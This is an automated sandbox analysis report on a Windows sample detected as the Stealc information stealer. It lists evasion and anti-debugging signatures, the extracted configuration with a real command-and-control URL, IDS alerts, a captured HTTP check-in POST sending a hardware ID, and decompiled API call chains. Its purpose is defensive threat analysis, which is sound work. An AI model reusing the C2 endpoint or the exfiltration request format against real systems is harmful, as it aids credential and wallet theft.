Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562041
MD5:ec2b785f84c4c57983920f431a8f78ce
SHA1:cfc54b34762d4a0e5036a9ea5566865721cf6a9f
SHA256:8c03b7c9bc22de662f3340049dd7fc98a640b99c0e4b58c1bf3a0d334be53ba8
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EC2B785F84C4C57983920F431A8F78CE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1698627871.0000000005750000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6724JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6724JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T06:36:05.519429+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php$XVAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.6724.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FD40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00FC6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00FBEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FB9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00FC6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FB9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FB7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FC18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FCCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00FC2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FBDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FC4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FC4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00FCD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00FCDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00FB16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 45 30 38 30 31 38 35 33 42 37 36 37 31 38 34 37 36 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"0CE0801853B7671847631------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00FB4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 45 30 38 30 31 38 35 33 42 37 36 37 31 38 34 37 36 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="hwid"0CE0801853B7671847631------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build"mars------ECGIIIDAKJDHJKFHIEBF--
              Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/L
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746029554.0000000001BF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php$XV
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
              Source: file.exe, 00000000.00000002.1746029554.0000000001B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/u
              Source: file.exe, 00000000.00000002.1746029554.0000000001BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00FB9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD48B00_2_00FD48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C1EE0_2_0129C1EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012271D50_2_012271D5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB0220_2_012CB022
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136507C0_2_0136507C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0146C8FE0_2_0146C8FE
